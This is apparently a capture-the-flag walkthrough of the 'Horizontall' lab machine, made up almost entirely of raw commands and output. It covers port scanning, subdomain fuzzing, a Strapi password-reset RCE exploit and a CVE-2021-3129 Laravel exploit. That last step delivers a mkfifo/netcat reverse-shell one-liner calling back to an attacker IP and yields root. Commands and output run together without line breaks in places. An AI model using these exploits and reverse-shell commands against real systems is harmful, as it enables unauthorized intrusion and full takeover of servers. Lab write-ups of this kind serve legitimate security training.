Horizontall
#easy #linux
Last updated
#easy #linux
Last updated
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63echo -n "$(cat allPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" | xclip -sel clipnmap -p 22,80 -sCV -Pn -n -vv 10.129.53.146 -oA openPortsServicesVersionPORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL2qJTqj1aoxBGb8yWIN4UJwFs4/UgDEutp3aiL2/6yV2iE78YjGzfU74VKlTRvJZWBwDmIOosOBNl9nfmEzXerD0g5lD5SporBx06eWX/XP2sQSEKbsqkr7Qb4ncvU8CvDR6yGHxmBT8WGgaQsA2ViVjiqAdlUDmLoT2qA3GeLBQgS41e+TysTpzWlY7z/rf/u0uj/C3kbixSB/upkWoqGyorDtFoaGGvWet/q7j5Tq061MaR6cM2CrYcQxxnPy4LqFE3MouLklBXfmNovryI0qVFMki7Cc3hfXz6BmKppCzMUPs8VgtNgdcGywIU/Nq1aiGQfATneqDD2GBXLjzV
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIyw6WbPVzY28EbBOZ4zWcikpu/CPcklbTUwvrPou4dCG4koataOo/RDg4MJuQP+sR937/ugmINBJNsYC8F7jN0=
| 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJqmDVbv9RjhlUzOMmw3SrGPaiDBgdZ9QZ2cKM49jzYB
80/tcp open http syn-ack nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelffuf -u http://horizontall.htb -H 'Host: FUZZ.horizontall.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 80 -c -ic -fs 194www [Status: 200, Size: 901, Words: 43, Lines: 2, Duration: 236ms]
api-prod [Status: 200, Size: 413, Words: 76, Lines: 20, Duration: 264ms]ffuf -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 -c -icreviews [Status: 200, Size: 507, Words: 21, Lines: 1, Duration: 324ms]
users [Status: 403, Size: 60, Words: 1, Lines: 1, Duration: 262ms]
admin [Status: 200, Size: 854, Words: 98, Lines: 17, Duration: 243ms]
Reviews [Status: 200, Size: 507, Words: 21, Lines: 1, Duration: 258ms]
Users [Status: 403, Size: 60, Words: 1, Lines: 1, Duration: 251ms]
Admin [Status: 200, Size: 854, Words: 98, Lines: 17, Duration: 233ms]
REVIEWS [Status: 200, Size: 507, Words: 21, Lines: 1, Duration: 292ms]cat strapi-rce.pydef check_strapi_version():
print("[+] Checking Strapi CMS version")
try:
response = requests.get(f"{target_url}/admin/init").json()
strapi_version = response["data"]["strapiVersion"]
print(f"[+] Strapi CMS Version: {strapi_version}") # that should be 3.0.0-beta.17.4
except Exception as e:
print(f"[-] Failed to check Strapi version: {e}")
sys.exit(1)nc -lnvp 1111python3 strapi-rce.py http://api-prod.horizontall.htb 10.10.14.8 1111
[+] Checking Strapi CMS version
[+] Strapi CMS Version: 3.0.0-beta.17.4
[+] Exploiting reset password vulnerability
[+] Password reset successful for user admin (admin@horizontall.htb)
[+] JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzYxMTg4MTY4LCJleHAiOjE3NjM3ODAxNjh9.KCIiCxp4nVrR600bDR9LdiNkEos81nP1-PfW0rIGXcM
[+] Sending reverse shell payload
[+] Payload sent, check your listener for a shellnc -nlvp 1111
Connection from 10.129.53.146:36236
/bin/sh: 0: can't access tty; job control turned off
$ strapi@horizontall:~/myapi$ ls
api build config extensions favicon.ico node_modules package.json package-lock.json public README.md
strapi@horizontall:~$ cd /home
strapi@horizontall:/home$ ls
developer
strapi@horizontall:/home$ cd developer/
strapi@horizontall:/home/developer$ ls
composer-setup.php myproject user.txt
strapi@horizontall:/home/developer$ cat user.txtstrapi@horizontall:/home/developer$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:1337 0.0.0.0:* users:(("node",pid=1966,fd=31))
tcp LISTEN 0 128 127.0.0.1:8000 0.0.0.0:*
tcp LISTEN 0 128 [::]:80 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:* strapi@horizontall:/home/developer$ curl http://127.0.0.1:8000Laravel v8 (PHP v7.4.18)ssh -i horizontall -L 8000:localhost:8000 strapi@horizontall.htbffuf -u http://localhost:8000/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 -c -icprofiles [Status: 500, Size: 616236, Words: 32882, Lines: 248, Duration: 492ms]nc -nlvp 2222python3 CVE-2021-3129.py http://localhost:8000 --cmd 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 2222 >/tmp/f'nc -nlvp 2222
Connection from 10.129.53.146:60094
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
boot.sh
pid
restart.sh
root.txt
# cat root.txt